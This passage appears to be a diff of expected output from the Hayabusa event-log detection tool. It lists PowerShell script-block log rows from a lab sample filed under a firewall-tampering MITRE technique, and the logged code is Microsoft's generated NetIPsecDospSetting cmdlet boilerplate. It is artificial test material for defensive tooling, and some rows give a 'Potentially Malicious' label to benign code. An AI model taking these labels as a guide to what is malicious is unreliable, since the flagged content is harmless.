[Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 